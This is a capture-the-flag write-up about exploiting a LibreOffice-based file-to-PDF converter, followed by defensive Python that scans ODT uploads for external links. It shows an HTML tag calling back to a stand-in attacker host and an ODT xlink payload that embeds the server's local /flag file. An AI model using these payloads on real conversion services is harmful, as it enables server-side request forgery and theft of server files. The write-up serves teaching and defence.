Free converter for everyone. You find the flag at: /flag
Link: http://22.214.171.124:1920
We are given a black-box web challenge. This application allows us to upload files in various formats (.doc, .jpg, etc.) and converts them into a PDF for us to download.
The first thing that came to mind was whether I could upload arbitrary HTML, since HTML has plenty of potential SSRF / file inclusion vectors. Sure enough, when I uploaded the following HTML file, I got a callback to my server.
<link rel=stylesheet href='http://ATTACKER.COM/exploit.css'>
The User-Agent showed that LibreOffice was making the callback.
OPTIONS /exploit.css HTTP/1.1
We create a sample LibreOffice word document, poc.odt. After unzipping the ODT file, we can modify the content.xml file to include our payload. We create a text:section tag that links to the
<?xml version="1.0" encoding="UTF-8"?>
xlink:href="file:///flag" xlink:type="simple" xlink:show="embed"
Then, zipping the files again into a modified.odt gives us our payload. Uploading this to the server gives us the flag!
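
On the converter's side, the linked-section trick above can be caught before the file ever reaches LibreOffice. The following is an added example, not code from the original writeup or from the challenge: it opens an uploaded ODT as a zip and reports every xlink:href that points outside the package. The function names and the two sample documents are constructed for illustration.

```python
import io
import zipfile
import xml.etree.ElementTree as ET
from urllib.parse import urlsplit

XLINK_HREF = "{http://www.w3.org/1999/xlink}href"
XML_PARTS = ("content.xml", "styles.xml")  # parts that can carry links


def external_links(odt_bytes):
    """Return (part, element, href) for each xlink:href leaving the package."""
    findings = []
    with zipfile.ZipFile(io.BytesIO(odt_bytes)) as pkg:
        for part in XML_PARTS:
            if part not in pkg.namelist():
                continue
            data = pkg.read(part)
            if b"<!DOCTYPE" in data:  # refuse DTDs rather than parse them
                findings.append((part, "DOCTYPE", ""))
                continue
            for elem in ET.fromstring(data).iter():
                href = elem.get(XLINK_HREF)
                if href is None:
                    continue
                # A scheme (file, http, ...) or an absolute/parent path is
                # resolved outside the package when the document is rendered.
                if urlsplit(href).scheme or href.startswith(("/", "../")):
                    findings.append((part, elem.tag.split("}")[-1], href))
    return findings


def make_odt(content_xml):
    """Build a minimal in-memory package (constructed test input)."""
    buf = io.BytesIO()
    with zipfile.ZipFile(buf, "w") as z:
        z.writestr("mimetype", "application/vnd.oasis.opendocument.text")
        z.writestr("content.xml", content_xml)
    return buf.getvalue()


# Constructed samples; layout is simplified, the scan keys on the attribute.
NS = ('xmlns:text="urn:oasis:names:tc:opendocument:xmlns:text:1.0" '
      'xmlns:xlink="http://www.w3.org/1999/xlink"')
SAMPLE_LINKED = make_odt(
    '<doc %s><text:section xlink:href="file:///flag" xlink:type="simple" '
    'xlink:show="embed"/></doc>' % NS)
SAMPLE_CLEAN = make_odt('<doc %s><text:p xlink:href="Pictures/a.png"/></doc>' % NS)

if __name__ == "__main__":
    print(external_links(SAMPLE_LINKED), external_links(SAMPLE_CLEAN))
```

A service would reject or strip any upload with findings, and still run the converter in a sandbox with no network access and no readable secrets, since HTML uploads reach the same renderer by a different route.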